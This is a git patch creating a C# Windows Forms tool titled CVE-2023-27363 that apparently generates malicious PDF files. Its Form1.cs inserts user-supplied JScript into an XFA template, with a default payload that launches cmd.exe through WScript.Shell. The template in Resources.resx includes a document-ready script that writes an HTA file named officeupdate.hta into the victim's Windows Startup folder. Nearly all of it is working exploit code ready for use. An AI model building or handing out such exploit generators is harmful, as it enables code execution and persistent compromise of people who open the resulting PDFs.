From 5005157763c80709e6748b0a308299e3bde2d242 Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Tue, 16 May 2023 00:09:13 +0800 Subject: [PATCH] init --- CVE-2023-27363.sln | 25 ++ CVE-2023-27363/App.config | 14 + CVE-2023-27363/CVE-2023-27363.csproj | 248 ++++++++++++++++++ CVE-2023-27363/FodyWeavers.xml | 3 + CVE-2023-27363/Form1.Designer.cs | 93 +++++++ CVE-2023-27363/Form1.cs | 45 ++++ CVE-2023-27363/Form1.resx | 120 +++++++++ CVE-2023-27363/Program.cs | 22 ++ CVE-2023-27363/Properties/AssemblyInfo.cs | 36 +++ .../Properties/Resources.Designer.cs | 72 +++++ CVE-2023-27363/Properties/Resources.resx | 123 +++++++++ .../Properties/Settings.Designer.cs | 30 +++ CVE-2023-27363/Properties/Settings.settings | 7 + CVE-2023-27363/packages.config | 56 ++++ 14 files changed, 894 insertions(+) create mode 100644 CVE-2023-27363.sln create mode 100644 CVE-2023-27363/App.config create mode 100644 CVE-2023-27363/CVE-2023-27363.csproj create mode 100644 CVE-2023-27363/FodyWeavers.xml create mode 100644 CVE-2023-27363/Form1.Designer.cs create mode 100644 CVE-2023-27363/Form1.cs create mode 100644 CVE-2023-27363/Form1.resx create mode 100644 CVE-2023-27363/Program.cs create mode 100644 CVE-2023-27363/Properties/AssemblyInfo.cs create mode 100644 CVE-2023-27363/Properties/Resources.Designer.cs create mode 100644 CVE-2023-27363/Properties/Resources.resx create mode 100644 CVE-2023-27363/Properties/Settings.Designer.cs create mode 100644 CVE-2023-27363/Properties/Settings.settings create mode 100644 CVE-2023-27363/packages.config diff --git a/CVE-2023-27363.sln b/CVE-2023-27363.sln new file mode 100644 index 0000000..1e27d99 --- /dev/null +++ b/CVE-2023-27363.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.4.33213.308 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2023-27363", "CVE-2023-27363\CVE-2023-27363.csproj", "{9B73265C-D94A-411E-BE5D-7CBA4065284A}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {9B73265C-D94A-411E-BE5D-7CBA4065284A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {9B73265C-D94A-411E-BE5D-7CBA4065284A}.Debug|Any CPU.Build.0 = Debug|Any CPU + {9B73265C-D94A-411E-BE5D-7CBA4065284A}.Release|Any CPU.ActiveCfg = Release|Any CPU + {9B73265C-D94A-411E-BE5D-7CBA4065284A}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {96AF5CC1-DB75-4CE7-BB6A-BDA640FB278D} + EndGlobalSection +EndGlobal diff --git a/CVE-2023-27363/App.config b/CVE-2023-27363/App.config new file mode 100644 index 0000000..668731d --- /dev/null +++ b/CVE-2023-27363/App.config @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/CVE-2023-27363/CVE-2023-27363.csproj b/CVE-2023-27363/CVE-2023-27363.csproj new file mode 100644 index 0000000..3c976de --- /dev/null +++ b/CVE-2023-27363/CVE-2023-27363.csproj @@ -0,0 +1,248 @@ + + + + + + Debug + AnyCPU + {9B73265C-D94A-411E-BE5D-7CBA4065284A} + WinExe + CVE_2023_27363 + CVE-2023-27363 + v4.7.2 + 512 + true + true + + + + + AnyCPU + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + AnyCPU + none + true + bin\Release\ + TRACE + prompt + 4 + + + + ..\packages\Aspose.PDF.23.4.0\lib\net4.0\Aspose.PDF.dll + + + ..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll + + + ..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll + True + True + + + ..\packages\Syncfusion.Compression.Net.Core.21.2.4\lib\netstandard2.0\Syncfusion.Compression.Portable.dll + + + ..\packages\Syncfusion.Licensing.21.2.4\lib\net46\Syncfusion.Licensing.dll + + + ..\packages\Syncfusion.Pdf.Net.Core.21.2.4\lib\netstandard2.0\Syncfusion.Pdf.Portable.dll + + + + ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll + True + True + + + + ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll + True + True + + + + ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll + + + ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll + True + True + + + ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll + True + True + + + ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll + True + True + + + ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll + True + True + + + + ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll + True + True + + + ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll + True + True + + + ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll + True + True + + + ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll + True + True + + + ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll + True + True + + + ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll + True + True + + + ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll + True + True + + + + ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll + True + True + + + ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll + True + True + + + ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll + True + True + + + ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll + True + True + + + ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll + True + True + + + ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll + True + True + + + ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll + True + True + + + ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll + True + True + + + ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll + True + True + + + ..\packages\System.Text.Encoding.CodePages.4.4.0\lib\net461\System.Text.Encoding.CodePages.dll + + + ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll + True + True + + + + + + + + + + + ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll + True + True + + + + + Form + + + Form1.cs + + + + + Form1.cs + + + ResXFileCodeGenerator + Resources.Designer.cs + Designer + + + True + Resources.resx + True + + + + SettingsSingleFileGenerator + Settings.Designer.cs + + + True + Settings.settings + True + + + + + + + + + + 这台计算机上缺少此项目引用的 NuGet 程序包。使用“NuGet 程序包还原”可下载这些程序包。有关更多信息,请参见 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的文件是 {0}。 + + + + + + + + + \ No newline at end of file diff --git a/CVE-2023-27363/FodyWeavers.xml b/CVE-2023-27363/FodyWeavers.xml new file mode 100644 index 0000000..5029e70 --- /dev/null +++ b/CVE-2023-27363/FodyWeavers.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/CVE-2023-27363/Form1.Designer.cs b/CVE-2023-27363/Form1.Designer.cs new file mode 100644 index 0000000..4b9c58a --- /dev/null +++ b/CVE-2023-27363/Form1.Designer.cs @@ -0,0 +1,93 @@ +namespace CVE_2023_27363 +{ + partial class Form1 + { + /// + /// 必需的设计器变量。 + /// + private System.ComponentModel.IContainer components = null; + + /// + /// 清理所有正在使用的资源。 + /// + /// 如果应释放托管资源,为 true;否则为 false。 + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows 窗体设计器生成的代码 + + /// + /// 设计器支持所需的方法 - 不要修改 + /// 使用代码编辑器修改此方法的内容。 + /// + private void InitializeComponent() + { + this.label1 = new System.Windows.Forms.Label(); + this.textBox1 = new System.Windows.Forms.TextBox(); + this.button1 = new System.Windows.Forms.Button(); + this.SuspendLayout(); + // + // label1 + // + this.label1.AutoSize = true; + this.label1.Font = new System.Drawing.Font("Segoe UI", 12F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.label1.Location = new System.Drawing.Point(12, 9); + this.label1.Name = "label1"; + this.label1.Size = new System.Drawing.Size(99, 21); + this.label1.TabIndex = 0; + this.label1.Text = "JScript Code:"; + // + // textBox1 + // + this.textBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.textBox1.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.textBox1.Location = new System.Drawing.Point(12, 33); + this.textBox1.Multiline = true; + this.textBox1.Name = "textBox1"; + this.textBox1.Size = new System.Drawing.Size(548, 216); + this.textBox1.TabIndex = 1; + this.textBox1.Text = "var c = \'cmd.exe /c notepad.exe\'; new ActiveXObject(\'WScript.Shell\').Run(c);"; + // + // button1 + // + this.button1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right))); + this.button1.Font = new System.Drawing.Font("Segoe UI", 10.5F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.button1.Location = new System.Drawing.Point(485, 255); + this.button1.Name = "button1"; + this.button1.Size = new System.Drawing.Size(75, 36); + this.button1.TabIndex = 2; + this.button1.Text = "Generate"; + this.button1.UseVisualStyleBackColor = true; + this.button1.Click += new System.EventHandler(this.button1_Click); + // + // Form1 + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(572, 303); + this.Controls.Add(this.button1); + this.Controls.Add(this.textBox1); + this.Controls.Add(this.label1); + this.Name = "Form1"; + this.Text = "CVE-2023-27363"; + this.ResumeLayout(false); + this.PerformLayout(); + + } + + #endregion + + private System.Windows.Forms.Label label1; + private System.Windows.Forms.TextBox textBox1; + private System.Windows.Forms.Button button1; + } +} + diff --git a/CVE-2023-27363/Form1.cs b/CVE-2023-27363/Form1.cs new file mode 100644 index 0000000..83d4412 --- /dev/null +++ b/CVE-2023-27363/Form1.cs @@ -0,0 +1,45 @@ +using Aspose.Pdf.Facades; +using Aspose.Pdf; +using Syncfusion.Pdf.Xfa; +using Syncfusion.Pdf; +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.IO; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; +using Form = System.Windows.Forms.Form; + +namespace CVE_2023_27363 +{ + public partial class Form1 : Form + { + public Form1() + { + InitializeComponent(); + } + + private void button1_Click(object sender, EventArgs e) + { + PdfXfaDocument document = new PdfXfaDocument(); + document.PageSettings.PageSize = PdfPageSize.A4; + PdfXfaPage xfaPage = document.Pages.Add(); + PdfXfaForm mainForm = new PdfXfaForm("subform", xfaPage, xfaPage.GetClientSize().Width); + document.XfaForm = mainForm; + MemoryStream stream = new MemoryStream(); + document.Save(stream, PdfXfaType.Dynamic); + document.Close(); + Document doc = new Document(stream); + doc.Form.XFA.XDP.InnerXml = Properties.Resources.String1.Replace("%payload%",textBox1.Text); + OpenFileDialog openFileDialog = new OpenFileDialog(); + openFileDialog.Multiselect = false; + openFileDialog.Filter = "(*.pdf)|*.pdf"; + if (openFileDialog.ShowDialog() == DialogResult.OK) + doc.Save(openFileDialog.FileName); + } + } +} diff --git a/CVE-2023-27363/Form1.resx b/CVE-2023-27363/Form1.resx new file mode 100644 index 0000000..1af7de1 --- /dev/null +++ b/CVE-2023-27363/Form1.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/CVE-2023-27363/Program.cs b/CVE-2023-27363/Program.cs new file mode 100644 index 0000000..893d777 --- /dev/null +++ b/CVE-2023-27363/Program.cs @@ -0,0 +1,22 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Threading.Tasks; +using System.Windows.Forms; + +namespace CVE_2023_27363 +{ + internal static class Program + { + /// + /// 应用程序的主入口点。 + /// + [STAThread] + static void Main() + { + Application.EnableVisualStyles(); + Application.SetCompatibleTextRenderingDefault(false); + Application.Run(new Form1()); + } + } +} diff --git a/CVE-2023-27363/Properties/AssemblyInfo.cs b/CVE-2023-27363/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..c6ec9ff --- /dev/null +++ b/CVE-2023-27363/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// 有关程序集的一般信息由以下 +// 控制。更改这些特性值可修改 +// 与程序集关联的信息。 +[assembly: AssemblyTitle("CVE-2023-27363")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("CVE-2023-27363")] +[assembly: AssemblyCopyright("Copyright © 2023")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// 将 ComVisible 设置为 false 会使此程序集中的类型 +//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 +//请将此类型的 ComVisible 特性设置为 true。 +[assembly: ComVisible(false)] + +// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID +[assembly: Guid("9b73265c-d94a-411e-be5d-7cba4065284a")] + +// 程序集的版本信息由下列四个值组成: +// +// 主版本 +// 次版本 +// 生成号 +// 修订号 +// +//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 +//通过使用 "*",如下所示: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/CVE-2023-27363/Properties/Resources.Designer.cs b/CVE-2023-27363/Properties/Resources.Designer.cs new file mode 100644 index 0000000..b2c4c29 --- /dev/null +++ b/CVE-2023-27363/Properties/Resources.Designer.cs @@ -0,0 +1,72 @@ +//------------------------------------------------------------------------------ +// +// 此代码由工具生成。 +// 运行时版本:4.0.30319.42000 +// +// 对此文件的更改可能会导致不正确的行为,并且如果 +// 重新生成代码,这些更改将会丢失。 +// +//------------------------------------------------------------------------------ + +namespace CVE_2023_27363.Properties { + using System; + + + /// + /// 一个强类型的资源类,用于查找本地化的字符串等。 + /// + // 此类是由 StronglyTypedResourceBuilder + // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 + // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen + // (以 /str 作为命令选项),或重新生成 VS 项目。 + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")] + [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + internal class Resources { + + private static global::System.Resources.ResourceManager resourceMan; + + private static global::System.Globalization.CultureInfo resourceCulture; + + [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] + internal Resources() { + } + + /// + /// 返回此类使用的缓存的 ResourceManager 实例。 + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Resources.ResourceManager ResourceManager { + get { + if (object.ReferenceEquals(resourceMan, null)) { + global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("CVE_2023_27363.Properties.Resources", typeof(Resources).Assembly); + resourceMan = temp; + } + return resourceMan; + } + } + + /// + /// 重写当前线程的 CurrentUICulture 属性,对 + /// 使用此强类型资源类的所有资源查找执行重写。 + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Globalization.CultureInfo Culture { + get { + return resourceCulture; + } + set { + resourceCulture = value; + } + } + + /// + /// 查找类似 <?xml version="1.0" encoding="UTF-8"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.65</version><creator>Syncfusion</creator><producer>Syncfusion</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><encryption><permissions><accessibleContent>1</accessibleContent><contentCopy>1</contentCopy><documentAssembly>1</documentAssembly><formFieldFilling>1</formFieldFillin [字符串的其余部分被截断]"; 的本地化字符串。 + /// + internal static string String1 { + get { + return ResourceManager.GetString("String1", resourceCulture); + } + } + } +} diff --git a/CVE-2023-27363/Properties/Resources.resx b/CVE-2023-27363/Properties/Resources.resx new file mode 100644 index 0000000..0a85d63 --- /dev/null +++ b/CVE-2023-27363/Properties/Resources.resx @@ -0,0 +1,123 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + <?xml version="1.0" encoding="UTF-8"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.65</version><creator>Syncfusion</creator><producer>Syncfusion</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><encryption><permissions><accessibleContent>1</accessibleContent><contentCopy>1</contentCopy><documentAssembly>1</documentAssembly><formFieldFilling>1</formFieldFilling><modifyAnnots>1</modifyAnnots><print>1</print><printHighQuality>1</printHighQuality><change>1</change><plaintextMetadata>1</plaintextMetadata></permissions></encryption><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression><linearized>1</linearized><script language="jscript">%payload%</script></pdf></present><acrobat><acrobat7><dynamicRender>required</dynamicRender></acrobat7></acrobat></config><template xmlns="http://www.xfa.org/schema/xfa-template/3.3/"><subform name="form1" locale="en_US" layout="tb"><pageSet><pageArea name="Page1"><contentArea x="0pt" y="0pt" w="595pt" h="842pt" /><medium short="595pt" long="842pt" /></pageArea></pageSet><subform name="subform1" layout="tb" w="595pt"><event activity="docReady" ref="$host" name="event__docReady"><script contentType="application/x-javascript">timeout = app.setTimeOut("event.target.exportXFAData({cPath: \"/c/users/\" + identity.loginName + \"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/officeupdate.hta\"});", 500);</script></event><margin /></subform></subform></template><xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><form1><subform1 /></form1></xfa:data></xfa:datasets></xdp:xdp> + + \ No newline at end of file diff --git a/CVE-2023-27363/Properties/Settings.Designer.cs b/CVE-2023-27363/Properties/Settings.Designer.cs new file mode 100644 index 0000000..6323b9b --- /dev/null +++ b/CVE-2023-27363/Properties/Settings.Designer.cs @@ -0,0 +1,30 @@ +//------------------------------------------------------------------------------ +// +// This code was generated by a tool. +// Runtime Version:4.0.30319.42000 +// +// Changes to this file may cause incorrect behavior and will be lost if +// the code is regenerated. +// +//------------------------------------------------------------------------------ + +namespace CVE_2023_27363.Properties +{ + + + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] + internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase + { + + private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); + + public static Settings Default + { + get + { + return defaultInstance; + } + } + } +} diff --git a/CVE-2023-27363/Properties/Settings.settings b/CVE-2023-27363/Properties/Settings.settings new file mode 100644 index 0000000..3964565 --- /dev/null +++ b/CVE-2023-27363/Properties/Settings.settings @@ -0,0 +1,7 @@ + + + + + + + diff --git a/CVE-2023-27363/packages.config b/CVE-2023-27363/packages.config new file mode 100644 index 0000000..f4cfbed --- /dev/null +++ b/CVE-2023-27363/packages.config @@ -0,0 +1,56 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file